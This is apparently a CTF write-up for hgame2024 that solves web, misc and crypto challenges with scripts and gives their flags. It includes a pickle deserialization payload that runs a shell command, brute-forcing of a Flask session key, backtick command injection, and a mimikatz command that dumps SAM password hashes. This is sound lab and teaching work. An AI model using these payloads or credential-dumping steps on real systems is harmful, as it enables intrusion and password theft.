hgame2024

week1

web

ezHTTP

```http
GET / HTTP/1.1
Host: 139.196.200.143:32581
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/5.0 (Vidar; VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Real-IP:127.0.0.1
Referer:vidar.club
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Response:

```http
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJGMTRnIjoiaGdhbWV7SFRUUF8hc18xbVAwclQ0bnR9In0.VKMdRQllG61JTReFhmbcfIdq7MvJDncYpjaT7zttEDc
```

https://jwt.io/decode
hgame{HTTP_!s_1mP0rT4nt}

Bypass it

Visiting the registration page triggers a JavaScript redirect.
Disable JavaScript in the browser, then register and log in.
Disable JavaScript extension: https://chromewebstore.google.com/detail/disable-javascript/jfpdlihdedhlmhlbgooailmfhahieoem?hl=zh-CN&utm_source=ext_sidebar

Select Courses

Course selection posts the course id to the API; every so often a course has a free slot, so write a script to grab it.

```python
import requests
import time

url = 'http://47.100.245.185:31531/api/courses'
headers = {'Content-Type': 'application/json'}

# Loop over course IDs 1-5
for course_id in range(1, 6):
    data = '{"id":%d}' % course_id
    while True:
        r = requests.post(url, data=data, headers=headers)
        # Print the response body
        print(r.text)
        time.sleep(2)  # wait 2 seconds

        # Stop retrying once the response says the course is no longer full
        if '"full":0' in r.text:
            break
        elif '"full":1' in r.text:
            continue
```

2048*16

Found in the JS:
message: ITMCnzbCn5eFIC=6yliXfzN=I5NMnz0XIC==yzycysi70ci7y7iK
game-won table: V+g5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl=QcTq6JkWK4t3
https://ctf.mzy0.com/CyberChef3/#recipe=From_Base64%EF%BC%88Base64%E8%BD%AC%E6%8D%A2%EF%BC%89(‘V%2Bg5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl%3DQcTq6JkWK4t3’,true)&input=SVRNQ256YkNuNWVGSUM9NnlsaVhmek49STVOTW56MFhJQz09eXp5Y3lzaTcwY2k3eTdpSw
flag{b99b820f-934d-44d4-93df-41361df7df2d}
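The decoding behind the CyberChef recipe above, as an added example that is not the write-up's code: a decoder for base64 written with a custom symbol table, where a 65th table character is the padding symbol as in CyberChef, so here `3` is the pad and `=` is an ordinary data symbol at index 52. As quoted, the message decodes to the flag from `g{` onward; the symbols for its first three characters are not reproduced in the write-up.

```python
# Standard table with '=' as its pad, for the sanity check at the bottom
STD_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
# Table and message quoted from the game's JS above (65th char '3' = pad)
GAME_TABLE = "V+g5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl=QcTq6JkWK4t3"
GAME_MESSAGE = "ITMCnzbCn5eFIC=6yliXfzN=I5NMnz0XIC==yzycysi70ci7y7iK"


def decode_custom_b64(data: str, table: str) -> bytes:
    """Decode base64 text written with a non-standard symbol table.

    table[:64] are the data symbols (value = position in the table);
    an optional table[64] is the padding symbol, at which decoding stops.
    """
    if len(table) not in (64, 65):
        raise ValueError("table needs 64 data symbols plus an optional pad")
    symbols = table[:64]
    pad = table[64] if len(table) == 65 else None
    if len(set(symbols)) != 64 or (pad is not None and pad in symbols):
        raise ValueError("table symbols must be unique")
    index = {ch: i for i, ch in enumerate(symbols)}

    out = bytearray()
    acc = 0      # bit accumulator
    nbits = 0    # number of valid bits currently in acc
    for ch in data:
        if ch == pad:
            break
        if ch not in index:
            raise ValueError(f"symbol {ch!r} is not in the table")
        acc = (acc << 6) | index[ch]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
            acc &= (1 << nbits) - 1   # keep only the leftover bits
    return bytes(out)


def decode_game_message() -> str:
    return decode_custom_b64(GAME_MESSAGE, GAME_TABLE).decode()


if __name__ == "__main__":
    print(decode_game_message())
    print(decode_custom_b64("aGVsbG8=", STD_TABLE))
```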

misc

SignIn

hgame{WOW_GREAT_YOU_SEE_IT_WONDERFUL}

希儿希儿希尔 (Hill)

The title hints that it is a Hill cipher.

Extract with foremost:
CVOCRJGMKLDJGBQIUIVXHEYLPNWR

hgame{DISAPPEARINTHESEAOFBUTTERFLY}
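The key matrix is not given in the write-up; this added example (not the author's code) recovers it from the ciphertext and the flag text above with a known-plaintext attack and then decrypts the whole message with it. It assumes a 2x2 key over A-Z in the column-vector convention C = K·P mod 26; under the row-vector convention the same key appears transposed.

```python
ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
CIPHERTEXT = "CVOCRJGMKLDJGBQIUIVXHEYLPNWR"   # from the write-up
KNOWN_PLAIN = "DISAPPEARINTHESEAOFBUTTERFLY"  # flag body from the write-up


def mat_inv2(m):
    """Inverse of a 2x2 matrix mod 26; ValueError if det is not a unit."""
    (a, b), (c, d) = m
    det_inv = pow((a * d - b * c) % 26, -1, 26)
    return [[d * det_inv % 26, -b * det_inv % 26],
            [-c * det_inv % 26, a * det_inv % 26]]


def mat_mul2(x, y):
    return [[sum(x[i][k] * y[k][j] for k in range(2)) % 26
             for j in range(2)] for i in range(2)]


def blocks(text):
    nums = [ALPHA.index(ch) for ch in text]
    return [nums[i:i + 2] for i in range(0, len(nums), 2)]


def apply_key(key, text):
    """C = K * P for every 2-letter block, blocks as column vectors."""
    out = []
    for p0, p1 in blocks(text):
        out.append(ALPHA[(key[0][0] * p0 + key[0][1] * p1) % 26])
        out.append(ALPHA[(key[1][0] * p0 + key[1][1] * p1) % 26])
    return "".join(out)


def recover_key(plain, cipher):
    """Known-plaintext attack: pick two plaintext blocks that form an
    invertible matrix P (as columns), then K = C * P^-1 mod 26.  A
    candidate is accepted only if it reproduces the whole ciphertext."""
    pb, cb = blocks(plain), blocks(cipher)
    for i in range(len(pb)):
        for j in range(i + 1, len(pb)):
            P = [[pb[i][0], pb[j][0]], [pb[i][1], pb[j][1]]]
            C = [[cb[i][0], cb[j][0]], [cb[i][1], cb[j][1]]]
            try:
                K = mat_mul2(C, mat_inv2(P))
            except ValueError:      # det(P) shares a factor with 26
                continue
            if apply_key(K, plain) == cipher:
                return K
    return None


def decrypt(cipher, key):
    return apply_key(mat_inv2(key), cipher)
```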

simple_attack


https://tool.jisuapi.com/base642pic.html
**hgame{s1mple_attack_for_zip}**

来自星尘的问候 (Greetings from Stardust)



https://my1l.github.io/Ctrl/CtrlAstr.html
**hgame{welc0me!}**

crypto

ezRSA

```python
from Crypto.Util.number import *
import gmpy2
p = 149127170073611271968182576751290331559018441805725310426095412837589227670757540743929865853650399839102838431507200744724939659463200158012469676979987696419050900842798225665861812331113632892438742724202916416060266581590169063867688299288985734104127632232175657352697898383441323477450658179727728908669
q = 116122992714670915381309916967490436489020001172880644167179915467021794892927977272080596641785569119134259037522388335198043152206150259103485574558816424740204736215551933482583941959994625356581201054534529395781744338631021423703171146456663432955843598548122593308782245220792018716508538497402576709461
c = 10529481867532520034258056773864074017027019578041866245400647840230251661652999709715919620810933437191661180003295923273655675729588558899592524235622728816065501918076120812236580344991140980991532347991252705288633014913479970610056845543523591324177567061948922552275235486615514913932125436543991642607028689762693617305246716492783116813070355512606971626645594961850567586340389705821314842096465631886812281289843132258131809773797777049358789182212570606252509790830994263132020094153646296793522975632191912463919898988349282284972919932761952603379733234575351624039162440021940592552768579639977713099971

n=p*q
phi=(p-1)*(q-1)
e=0x10001
d=gmpy2.invert(e,phi)

m= pow(c,d,n)
print(long_to_bytes(m))
```

week2

misc

ek1ng_want_girlfriend

Follow tcp.stream eq 0
Extract the jpg from the hexdump
hgame{ek1ng_want_girlfriend_qq_761042182}

ezWord

Rename it to zip
word\media
Congratulations, you found these. Now you are only one step away from the flag: open this new archive, then apply two layers of decoding to what is inside to get the flag. The archive password is related to the two images I put here.


T1hi3sI4sKey
Hello, glad you found this archive. Note: the password of this archive is 11 characters long and contains uppercase letters, lowercase letters and digits. One more thing: the pile of English inside looks like garbled Chinese after decoding; that is actually normal, and if you see it you are only one step from success.


Decode the English text from the archive with https://www.spammimic.com/decode.cgi:

```
籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆
```

Convert to unicode code points and take the last two hex digits of each:

```
71 70 6a 76 6e 84 39 74 68 82 78 7e 68 7c 39 75 7f 6e 68 6a 75 3a 68 7d 71 3c 68 7c 6e 6c 7b 3c 7d 86
```
```python
a = '71 70 6a 76 6e 84 39 74 68 82 78 7e 68 7c 39 75 7f 6e 68 6a 75 3a 68 7d 71 3c 68 7c 6e 6c 7b 3c 7d 86 '
# split() rather than split(' '): the trailing space would otherwise yield
# an empty token and int('', 16) would raise.  Each value is the flag
# character's ASCII code plus 9.
for i in a.split():
    print(chr(int(i, 16) - 9), end='')
#hgame{0k_you_s0lve_al1_th3_secr3t}
```

龙之舞 (Dragon's Dance)

Flip the spectrogram vertically (mirror top to bottom).

5H8w1nlWCX3hQLG
deepsound
You get a gif; split out the 4 parts of the QR code and stitch them together.
https://merri.cx/qrazybox/
Use the Tools module.

crypto

midRSA

The flag is leaked directly.

```python
from Crypto.Util.number import *

a= 13292147408567087351580732082961640130543313742210409432471625281702327748963274496942276607
print(long_to_bytes(a))
#b'hgame{0ther_cas3s_0f_c0ppr3smith}\xff\xff\xff\xff\xff'
```

backpack

```python
from Crypto.Util.number import long_to_bytes

enc = 871114172567853490297478570113449366988793760172844644007566824913350088148162949968812541218339
a = [3245882327, 3130355629, 2432460301, 3249504299, 3762436129, 3056281051, 3484499099, 2830291609, 3349739489, 2847095593, 3532332619, 2406839203, 4056647633, 3204059951, 3795219419, 3240880339, 2668368499, 4227862747, 2939444527, 3375243559]
bag = 45893025064

# Reconstruct p: one bit per prime, most significant bit first
p = 0
for prime in a:
    if bag % prime == 0:
        p |= 1
    p <<= 1
    bag //= prime

p >>= 1  # Remove the extra left shift at the end of the loop

# Decrypt the ciphertext
dec = enc ^ p

flag = long_to_bytes(dec)
print(flag)
#hgame{M@ster_0f ba3kpack_m4nag3ment!}
```

web

What the cow say?

Command execution is possible.
After some fuzzing, backticks and print work:

```
print `ls /`
```

The flag is at flag_is_here/flag_c0w54y, but "flag" is filtered:

```
print `/f*/f*`
```

myflask

```python
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])

    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'

if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")
```

One look at the source makes it obvious: session forgery plus pickle deserialization.
The session key is the current time: app.config['SECRET_KEY'] = currentTime
The key is created when the script runs at container start, so the key is the container's start time.
Note the approximate time you started the container, e.g. 23:56, and try values around it.
You can also brute-force it directly with flask-unsign:
download the source from GitHub and run python setup.py install.
Generate the wordlist:

```python
# Open the wordlist file for writing
with open('1.txt', 'w') as file:
    # Generate every candidate
    for number in range(1000000):
        # 6-digit number, zero-padded on the left
        password = format(number, '06d')
        # Write it to the file
        file.write(password + '\n')

print("密码生成完成。")
```

```bash
flask-unsign --unsign --cookie 'eyJ1c2VybmFtZSI6Imd1ZXN0In0.Zc40VA.I1YZ3EhqqmkBJpga_wgyLGYS7UI' --no-literal-eval --wordlist 1.txt
```

235654
Or type the candidates in by hand.

Then use the forged session.

Then build the deserialization payload so that the command output comes back inside a raised exception; it has to be generated on Linux.

```python
import pickle
import base64
class A(object):
    def __reduce__(self):
        return (exec,("raise Exception(__import__('os').popen('tac /flag').read())",))
a=A()
test=pickle.dumps(a)
print(base64.b64encode(test))
#b'gASVVwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIw7cmFpc2UgRXhjZXB0aW9uKF9faW1wb3J0X18oJ29zJykucG9wZW4oJ3RhYyAvZmxhZycpLnJlYWQoKSmUhZRSlC4='
```
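Hardened counterparts of the two weaknesses above, as an added example that is not the challenge's or the write-up's code: a SECRET_KEY from the OS CSPRNG instead of a six-digit HHMMSS string (at most 86400 candidates), and an unpickler whose find_class refuses every global, so a __reduce__ gadget like the payload above is stopped at its STACK_GLOBAL opcode before anything runs. The base64 string is the payload printed by the script above, used only as a rejection test vector; the class and function names are mine.

```python
import base64
import io
import pickle
import secrets

# base64 pickle printed by the payload script above; used only as a test
# vector that the hardened loader must reject (never pass it to pickle.loads)
PAGE_PAYLOAD_B64 = (
    "gASVVwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIw7cmFpc2UgRXhjZXB0aW9uKF9f"
    "aW1wb3J0X18oJ29zJykucG9wZW4oJ3RhYyAvZmxhZycpLnJlYWQoKSmUhZRSlC4="
)


def make_secret_key() -> bytes:
    """256-bit key from the OS CSPRNG.  The app above used HHMMSS at
    start-up, i.e. at most 86400 candidates, checkable offline as shown."""
    return secrets.token_bytes(32)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every GLOBAL / STACK_GLOBAL lookup.

    Any RCE gadget (a __reduce__ returning exec, os.system, ...) must
    first import its callable through find_class, so refusing here stops
    the gadget before REDUCE can call it.  Only builtin containers and
    scalars can still be loaded.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if safe_loads refuses the pickle instead of executing it."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def page_payload() -> bytes:
    return base64.b64decode(PAGE_PAYLOAD_B64)


def round_trip(obj):
    """Harmless data still loads: the restriction keeps plain values usable."""
    return safe_loads(pickle.dumps(obj))


if __name__ == "__main__":
    print("payload rejected:", is_rejected(page_payload()))
    print(round_trip({"username": "guest", "roles": [1, 2]}))
```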

week3

misc

与ai聊天 (Chat with the AI)

Blind SQL Injection

Done by hand; just pay attention to the one payload right before 63.
https://ctf.mzy0.com/CyberChef3/#recipe=From_Decimal%EF%BC%8810%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2%EF%BC%89('Space',false)Reverse('Character')&input=MTI1IDEwMiA1MCAxMDIgOTcgNTYgNTAgNTcgNTMgOTkgNTYgNTEgMTAwIDQ1IDU0IDk5IDk3IDk4IDQ1IDU2IDU3IDEwMSA1MiA0NSA1MyA1MCA1NSA0OSA0NSA1NSAxMDEgMTAyIDk3IDk4IDk3IDk4IDk5IDEyMyAxMDMgOTcgMTA4IDEwMiA0NCA
flag{cbabafe7-1725-4e98-bac6-d38c5928af2f}

简单的取证,不过前十个有红包 (Simple forensics, but the first ten get a red envelope)

It is in the vmdk file from the other challenge.
Extract it with 7z.
Find the key image under Documents and Settings\Administrator\桌面 (the Desktop folder).
968fJD17UBzZG6e3yjF6
Mount the VeraCrypt (vc) volume to get hgame{happy_new_year_her3_1s_a_redbag_key_41342177}

简单的vmdk取证 (Simple vmdk forensics)

Find the SAM and SYSTEM files.
Save them as sam.hiv and system.hiv.
lsadump::sam /sam:sam /system:system

Cracking the md5 gives Admin1234
hgame{DAC3A2930FC196001F3AEAB959748448_Admin1234}


hgame2024
http://example.com/2024/02/16/hgame2024/
Author: J_0k3r
Published: February 16, 2024
License: BY J_0K3R